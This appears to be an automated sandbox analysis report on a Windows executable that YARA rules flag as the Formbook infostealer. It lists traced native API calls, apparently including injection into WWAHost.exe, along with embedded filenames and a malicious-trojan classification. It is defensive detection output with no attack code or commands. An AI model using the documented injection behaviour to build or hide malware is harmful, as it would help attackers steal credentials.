Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041825A NtReadFile,	1_2_0041825A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_004182DD NtClose,	1_2_004182DD
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01179910
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011799A0 NtCreateSection,LdrInitializeThunk,	1_2_011799A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179840 NtDelayExecution,LdrInitializeThunk,	1_2_01179840
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01179860
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011798F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_011798F0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01179A00
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179A20 NtResumeThread,LdrInitializeThunk,	1_2_01179A20
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179A50 NtCreateFile,LdrInitializeThunk,	1_2_01179A50
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179540 NtReadFile,LdrInitializeThunk,	1_2_01179540
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011795D0 NtClose,LdrInitializeThunk,	1_2_011795D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01179710
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01179780
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011797A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_011797A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179FE0 NtCreateMutant,LdrInitializeThunk,	1_2_01179FE0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01179660
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011796E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_011796E0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179950 NtQueueApcThread,	1_2_01179950
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011799D0 NtCreateProcessEx,	1_2_011799D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179820 NtEnumerateKey,	1_2_01179820
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0117B040 NtSuspendThread,	1_2_0117B040
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011798A0 NtWriteVirtualMemory,	1_2_011798A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179B00 NtSetValueKey,	1_2_01179B00
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0117A3B0 NtGetContextThread,	1_2_0117A3B0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179A10 NtQuerySection,	1_2_01179A10
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179A80 NtOpenDirectoryObject,	1_2_01179A80
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0117AD30 NtSetContextThread,	1_2_0117AD30
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179520 NtWaitForSingleObject,	1_2_01179520
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179560 NtWriteFile,	1_2_01179560
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011795F0 NtQueryInformationFile,	1_2_011795F0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0117A710 NtOpenProcessToken,	1_2_0117A710
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179730 NtQueryVirtualMemory,	1_2_01179730
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0117A770 NtOpenThread,	1_2_0117A770
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179770 NtSetInformationFile,	1_2_01179770
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179760 NtOpenProcess,	1_2_01179760
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179610 NtEnumerateValueKey,	1_2_01179610
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179650 NtQueryValueKey,	1_2_01179650
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01179670 NtQueryInformationProcess,	1_2_01179670
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011796D0 NtCreateKey,	1_2_011796D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199710 NtQueryInformationToken,LdrInitializeThunk,	6_2_03199710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199780 NtMapViewOfSection,LdrInitializeThunk,	6_2_03199780
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199FE0 NtCreateMutant,LdrInitializeThunk,	6_2_03199FE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199A50 NtCreateFile,LdrInitializeThunk,	6_2_03199A50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199650 NtQueryValueKey,LdrInitializeThunk,	6_2_03199650
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03199660
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031996D0 NtCreateKey,LdrInitializeThunk,	6_2_031996D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031996E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_031996E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_03199910
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199540 NtReadFile,LdrInitializeThunk,	6_2_03199540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031999A0 NtCreateSection,LdrInitializeThunk,	6_2_031999A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031995D0 NtClose,LdrInitializeThunk,	6_2_031995D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199840 NtDelayExecution,LdrInitializeThunk,	6_2_03199840
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03199860
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0319A710 NtOpenProcessToken,	6_2_0319A710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199B00 NtSetValueKey,	6_2_03199B00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199730 NtQueryVirtualMemory,	6_2_03199730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199770 NtSetInformationFile,	6_2_03199770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0319A770 NtOpenThread,	6_2_0319A770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199760 NtOpenProcess,	6_2_03199760
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0319A3B0 NtGetContextThread,	6_2_0319A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031997A0 NtUnmapViewOfSection,	6_2_031997A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199610 NtEnumerateValueKey,	6_2_03199610
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199A10 NtQuerySection,	6_2_03199A10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199A00 NtProtectVirtualMemory,	6_2_03199A00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199A20 NtResumeThread,	6_2_03199A20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199670 NtQueryInformationProcess,	6_2_03199670
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199A80 NtOpenDirectoryObject,	6_2_03199A80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0319AD30 NtSetContextThread,	6_2_0319AD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199520 NtWaitForSingleObject,	6_2_03199520
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199950 NtQueueApcThread,	6_2_03199950
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199560 NtWriteFile,	6_2_03199560
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031999D0 NtCreateProcessEx,	6_2_031999D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031995F0 NtQueryInformationFile,	6_2_031995F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03199820 NtEnumerateKey,	6_2_03199820
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0319B040 NtSuspendThread,	6_2_0319B040
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031998A0 NtWriteVirtualMemory,	6_2_031998A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031998F0 NtReadVirtualMemory,	6_2_031998F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_003381B0 NtCreateFile,	6_2_003381B0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00338260 NtReadFile,	6_2_00338260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_003382E0 NtClose,	6_2_003382E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00338390 NtAllocateVirtualMemory,	6_2_00338390
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_003381AB NtCreateFile,	6_2_003381AB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033825A NtReadFile,	6_2_0033825A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_003382DD NtClose,	6_2_003382DD

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BAABC3	0_2_01BAABC3
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA15E0	0_2_01BA15E0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA2F7B	0_2_01BA2F7B
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA0EB8	0_2_01BA0EB8
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA4B18	0_2_01BA4B18
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA4B09	0_2_01BA4B09
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA12A8	0_2_01BA12A8
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA1298	0_2_01BA1298
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA15D0	0_2_01BA15D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA4D51	0_2_01BA4D51
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BA0EA5	0_2_01BA0EA5
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00408C4B	1_2_00408C4B
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00408C50	1_2_00408C50
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00408C0C	1_2_00408C0C
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041B493	1_2_0041B493
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041CD71	1_2_0041CD71
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00402D87	1_2_00402D87
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041CE59	1_2_0041CE59
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041B7A6	1_2_0041B7A6
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113F900	1_2_0113F900
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01154120	1_2_01154120
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0120E824	1_2_0120E824
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F1002	1_2_011F1002
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115A830	1_2_0115A830
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114B090	1_2_0114B090
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_012020A8	1_2_012020A8
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_012028EC	1_2_012028EC
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01202B28	1_2_01202B28
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115AB40	1_2_0115AB40
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116EBB0	1_2_0116EBB0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F03DA	1_2_011F03DA
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011FDBD2	1_2_011FDBD2
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011EFA2B	1_2_011EFA2B
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_012022AE	1_2_012022AE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01202D07	1_2_01202D07
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01130D20	1_2_01130D20
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01201D55	1_2_01201D55
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01162581	1_2_01162581
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114D5E0	1_2_0114D5E0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_012025DD	1_2_012025DD
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114841F	1_2_0114841F
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011FD466	1_2_011FD466
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01201FF1	1_2_01201FF1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0120DFCE	1_2_0120DFCE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011FD616	1_2_011FD616
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01156E30	1_2_01156E30
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01202EF7	1_2_01202EF7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03222B28	6_2_03222B28
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0318EBB0	6_2_0318EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03221FF1	6_2_03221FF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321DBD2	6_2_0321DBD2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03176E30	6_2_03176E30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_032222AE	6_2_032222AE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03222EF7	6_2_03222EF7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0315F900	6_2_0315F900
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03222D07	6_2_03222D07
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03150D20	6_2_03150D20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03174120	6_2_03174120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03221D55	6_2_03221D55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03182581	6_2_03182581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316D5E0	6_2_0316D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_032225DD	6_2_032225DD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316841F	6_2_0316841F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_03211002	6_2_03211002
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0321D466	6_2_0321D466
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0316B090	6_2_0316B090
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_032220A8	6_2_032220A8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031820A0	6_2_031820A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_032228EC	6_2_032228EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00328C0C	6_2_00328C0C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00328C50	6_2_00328C50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00328C4B	6_2_00328C4B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033B493	6_2_0033B493
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033CD71	6_2_0033CD71
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00322D90	6_2_00322D90
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00322D87	6_2_00322D87
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033CE59	6_2_0033CE59
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00322FB0	6_2_00322FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033B7A6	6_2_0033B7A6

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: String function: 0113B150 appears 54 times
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 0315B150 appears 35 times

Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePositiveSign.dll< vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.675137695.0000000001080000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoapName.dll2 vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718379211.0000000002E26000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameWWAHost.exej% vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.717394980.00000000013BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe, 00000001.00000000.674352218.0000000000760000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
Source: JdtN8nIcLi8RQOi.exe	Binary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe

Source: JdtN8nIcLi8RQOi.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@18/12

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\JdtN8nIcLi8RQOi.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01

Source: JdtN8nIcLi8RQOi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
